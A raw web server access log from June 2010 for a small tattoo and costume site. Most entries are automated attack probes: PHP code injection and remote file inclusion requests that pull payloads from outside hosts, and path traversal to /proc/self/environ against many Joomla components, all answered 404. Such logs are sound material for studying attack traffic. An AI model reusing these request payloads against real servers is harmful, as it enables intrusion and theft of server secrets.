75.126.138.51 - - [02/Jun/2010:08:34:07 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:08:34:07 -0500] "GET /logs/access_log.1271894400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:08:34:07 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 297 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:08:34:07 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:08:34:07 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:08:34:27 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:08:34:27 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 297 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:08:34:27 -0500] "GET /logs/access_log.1271894400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:08:34:28 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
89.200.142.93 - - [02/Jun/2010:08:34:33 -0500] "GET /*?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.823"
62.44.82.61 - - [02/Jun/2010:08:34:56 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:08:34:56 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:08:34:56 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 297 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:08:34:56 -0500] "GET /logs/access_log.1271894400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:08:35:20 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 297 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:08:35:20 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:08:35:20 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:08:35:21 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 297 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:08:35:21 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:08:35:21 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
67.195.112.180 - - [02/Jun/2010:08:35:45 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [02/Jun/2010:08:35:46 -0500] "GET /tattoo/set1.htm HTTP/1.0" 200 2362 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
75.126.138.51 - - [02/Jun/2010:08:36:01 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 297 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:08:36:01 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 326 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:08:36:02 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:08:36:03 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:08:36:03 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 297 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:08:36:03 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 326 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:08:36:04 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 297 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:08:36:04 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 326 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:08:36:04 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
210.56.94.114 - - [02/Jun/2010:08:36:17 -0500] "GET /logs/*?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
210.56.94.114 - - [02/Jun/2010:08:36:18 -0500] "GET /*?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.831"
200.135.228.230 - - [02/Jun/2010:08:37:13 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 297 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:08:37:13 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:08:37:13 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:08:37:14 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 326 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:08:37:14 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:08:37:18 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 297 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:08:37:18 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:08:37:18 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:08:37:43 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:08:37:43 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 297 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:08:37:43 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:08:37:43 -0500] "GET /logs/access_log.1271894400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:08:38:00 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 326 "-""Mozilla/5.0"
205.234.101.201 - - [02/Jun/2010:08:38:49 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
205.234.101.201 - - [02/Jun/2010:08:38:49 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
222.122.52.80 - - [02/Jun/2010:08:39:17 -0500] "GET //activecontent.php?vsDragonRootPath=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
222.122.52.80 - - [02/Jun/2010:08:39:18 -0500] "GET /logs//activecontent.php?vsDragonRootPath=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
89.200.142.93 - - [02/Jun/2010:08:40:33 -0500] "GET /logs/access_log.1274832000/*?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.823"
77.222.56.62 - - [02/Jun/2010:08:40:33 -0500] "GET /config.php?path_to_root=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.142.93 - - [02/Jun/2010:08:40:33 -0500] "GET /*?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.823"
77.222.56.62 - - [02/Jun/2010:08:40:33 -0500] "GET /logs/config.php?path_to_root=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.142.93 - - [02/Jun/2010:08:40:33 -0500] "GET /logs/*?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.823"
89.200.142.93 - - [02/Jun/2010:08:40:34 -0500] "GET /*?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.823"
200.135.228.230 - - [02/Jun/2010:08:41:07 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 326 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:08:41:10 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 297 "-""Mozilla/5.0"
200.135.228.230 - - [02/Jun/2010:08:41:10 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.190.102.21 - - [02/Jun/2010:08:42:25 -0500] "GET //administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
121.190.102.21 - - [02/Jun/2010:08:42:26 -0500] "GET /logs//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
121.190.102.21 - - [02/Jun/2010:08:42:26 -0500] "GET /logs/access_log.1272412800//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 384 "-""Mozilla/5.0"
121.190.102.21 - - [02/Jun/2010:08:42:42 -0500] "GET /logs/access_log.1270512000//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 384 "-""Mozilla/5.0"
222.122.52.80 - - [02/Jun/2010:08:42:53 -0500] "GET //login.php?svr_rootscript=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
222.122.52.80 - - [02/Jun/2010:08:42:54 -0500] "GET /logs//login.php?svr_rootscript=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.56.94.114 - - [02/Jun/2010:08:43:29 -0500] "GET /logs/*?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
210.56.94.114 - - [02/Jun/2010:08:43:29 -0500] "GET /*?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.831"
200.135.228.230 - - [02/Jun/2010:08:43:41 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 326 "-""Mozilla/5.0"
210.56.94.114 - - [02/Jun/2010:08:44:51 -0500] "GET /logs/*?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
210.56.94.114 - - [02/Jun/2010:08:44:52 -0500] "GET /*?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.831"
67.195.112.180 - - [02/Jun/2010:08:48:04 -0500] "GET /costume/costume1.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.55.43.66 - - [02/Jun/2010:08:48:08 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
38.101.148.126 - - [02/Jun/2010:08:48:43 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [02/Jun/2010:08:48:51 -0500] "GET /logs/access_log.1213056000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
64.56.46.102 - - [02/Jun/2010:08:49:32 -0500] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.810"
64.56.46.102 - - [02/Jun/2010:08:49:32 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
218.146.255.196 - - [02/Jun/2010:08:50:15 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
204.93.174.47 - - [02/Jun/2010:08:50:50 -0500] "GET /logs/index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
204.93.174.47 - - [02/Jun/2010:08:50:50 -0500] "GET /index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
207.46.13.137 - - [02/Jun/2010:08:55:11 -0500] "GET /logs/access_log.1202860800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.55.43.66 - - [02/Jun/2010:08:55:29 -0500] "GET /logs/access_log.1273017600/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.43.66 - - [02/Jun/2010:08:55:29 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.55.43.66 - - [02/Jun/2010:08:55:30 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
76.175.52.83 - - [02/Jun/2010:08:55:52 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://www.google.com/imglanding?q=tattoo%20flash%20sheets&imgurl=http://i10.tinypic.com/4mcebko.jpg&imgrefurl=http://www.taringa.net/posts/downloads/2356356/dise%25C3%25B1os-grandes--y-no-tanto-para-tatuajes.html&usg=__0BbWSmeNRih_bbu0SSUY2Cvu-ng=&h=1131&w=1600&sz=373&hl=en&itbs=1&tbnid=_PilX3MX2qjxGM:&tbnh=106&tbnw=150&prev=/images%3Fq%3Dtattoo%2Bflash%2Bsheets%26tbnid%3DU69NUSLlTJtxgM%26tbnh%3D0%26tbnw%3D0%26hl%3Den%26sa%3DX%26imgtype%3Di_similar%26tbs%3Disch:1&tbnid=U69NUSLlTJtxgM&tbnh=0&tbnw=0&sa=X&imgtype=i_similar&tbs=isch:1&start=0""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.2; AskTB5.6)"
222.122.52.80 - - [02/Jun/2010:08:56:17 -0500] "GET //include.php?path[docroot]=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
222.122.52.80 - - [02/Jun/2010:08:56:17 -0500] "GET /logs//include.php?path[docroot]=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
222.236.47.182 - - [02/Jun/2010:08:56:19 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
222.236.47.182 - - [02/Jun/2010:08:56:21 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
222.236.47.182 - - [02/Jun/2010:08:56:21 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.143.98.160 - - [02/Jun/2010:08:56:40 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
204.93.174.47 - - [02/Jun/2010:08:57:00 -0500] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
204.93.174.47 - - [02/Jun/2010:08:57:00 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
121.190.102.21 - - [02/Jun/2010:08:57:17 -0500] "GET /logs/access_log.1271548800//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
121.190.102.21 - - [02/Jun/2010:08:57:17 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
121.190.102.21 - - [02/Jun/2010:08:57:17 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
74.55.43.66 - - [02/Jun/2010:08:57:27 -0500] "GET /logs/access_log.1273017600/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.43.66 - - [02/Jun/2010:08:57:27 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.55.43.66 - - [02/Jun/2010:08:57:27 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
210.143.98.160 - - [02/Jun/2010:08:57:34 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
210.143.98.160 - - [02/Jun/2010:08:57:35 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.143.98.160 - - [02/Jun/2010:08:57:35 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
67.195.112.180 - - [02/Jun/2010:08:58:29 -0500] "GET /logs/access_log.1165968000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.245.155.249 - - [02/Jun/2010:09:00:10 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:00:11 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
207.46.13.46 - - [02/Jun/2010:09:00:15 -0500] "GET /logs/access_log.1197590400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.238.145.196 - - [02/Jun/2010:09:00:20 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 308 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:09:00:22 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 313 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:09:00:22 -0500] "GET /logs/access_log.1272326400//Neos_Chronos/header.php?base_folder=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 335 "-""Mozilla/5.0"
95.245.155.249 - - [02/Jun/2010:09:00:25 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:00:25 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:00:25 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:00:25 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:00:25 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
95.245.155.249 - - [02/Jun/2010:09:00:25 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ImageShackToolbar/5.2.4 ( .NET CLR 3.5.30729)"
